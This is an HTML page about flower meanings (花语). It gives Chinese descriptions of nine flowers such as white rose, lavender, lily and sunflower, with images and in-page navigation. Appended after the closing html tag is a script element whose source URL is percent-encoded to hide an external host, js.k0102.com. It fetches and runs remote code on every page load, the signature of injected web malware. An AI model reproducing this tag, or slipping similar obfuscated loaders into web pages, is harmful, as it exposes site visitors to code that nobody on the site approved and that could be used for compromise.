<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8" />
		<title>花语</title>
	</head>
	<body>
		<a id="top"></a>
		<h2>花语&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
			<span style="font-size: 14px; font-weight: normal;">
		<a href="#bmg">白玫瑰</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href="#www">勿忘我</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href="#xyc">薰衣草</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href="#bhh">百合花</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href="#mtx">满天星</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href="#hdl">蝴蝶兰</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href="#xqh">绣球花</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href="#xrk">向日葵</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href="#fmg">粉玫瑰</a></span>
		</h2>
		<hr  color=brown size="2"/>
	    <h4><a id="bmg">白玫瑰的花语</a></h4>
	    <img src="img/huayu1.jpg" width="150" height="164" />
		<p style="text-indent: 2em;font-size: 14px;"><span style="font-weight: bolder;">尊敬</span>；不被注意的美；<span style="font-weight: bolder;">诚实</span>；纯纯的爱；甘心为你付出所有；高贵；智慧；纯洁、纯情、天真；我足以与你相配。送白玫瑰代表你单纯的爱着她。</p>
		<h4><a id="www">勿忘我的花语</a></h4>
		<img src="img/huayu2.jpg" width="150" height="164" />
		<p style="text-indent: 2em;font-size: 14px;">不要忘记我、真实的爱、真爱、永恒的爱、永不变的心、永远的回忆。如果，你一不小心被勿忘我打动了，就送女朋友一束吧，让她也感受下这份心动。</p>
		<h4><a id="xyc">薰衣草的花语</a></h4>
		<img src="img/huayu3.jpg" width="150" height="164"  />
		<p style="text-indent: 2em;font-size: 14px;">等待爱情；只要用力呼吸，就能看见奇迹；心心相印；浪漫；面对没有希望的爱，依然痴痴等待。</p>
		<h4><a id="bhh">百合花的花语</a></h4>
		<img src="img/huayu4.jpg" width="150" height="164"  />
		<p style="text-indent: 2em;font-size: 14px;">顺利、心想事成、祝福、高贵。<br /> 百合花有多种花色以及品种，它们的花语也不一样。</p>
		<ul>
			<li>白百合花语：纯洁、庄严、心心相印</li>
            <li>粉百合花语：纯洁、可爱</li>
            <li>红百合花语：永远爱你、富贵、吉祥</li>
            <li>黄百合花语：早日康复</li>
            <li>黑百合花语：恋、诅咒</li>
            <li>野百合花语：永远幸福</li>
            <li>香水百合花语：纯洁、婚礼的祝福、高贵</li>
		</ul>
		<h4><a id="mtx">满天星的花语</a></h4>
		<img src="img/huayu5.jpg" width="150" height="164"  />
		<p style="text-indent: 2em;font-size: 14px;">爱人的呼吸。</p>
		<h4><a id="hdl">蝴蝶兰的花语</a></h4>
		<img src="img/huayu6.jpg" width="150" height="164"  />
		<p style="text-indent: 2em;font-size: 14px;">我爱你，幸福向你飞来！</p>
		<h4><a id="xqh">绣球花的花语</a></h4>
		<img src="img/huayu7.jpg" width="150" height="164"  />
		<p style="text-indent: 2em;font-size: 14px;">希望、忠贞、永恒、美满、团聚等，送绣球花代表非常美好的祝福。</p>
		<h4><a id="xrk">向日葵的花语</a></h4>
		<img src="img/huayu8.jpg" width="150" height="164"  />
		<p style="text-indent: 2em;font-size: 14px;">你是我的阳光天使，带给我无比自信和勇气。</p>
		<h4><a id="fmg">粉玫瑰的花语</a></h4>
		<img src="img/huayu9.jpg" width="150" height="164"  />
		<p style="text-indent: 2em;font-size: 14px;">初恋、特别的关怀、喜欢你那灿烂的微笑。</p>
		<p><a href="#top">返回顶部</a></p>
		<p><a href="default.html" target="_blank">首页</a></p>
		<hr color="brown" size="2"/>
		<p style="text-align: center;">&copy;版权所有：鲜花屋工作坊</p>
	</body>
</html>
<script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>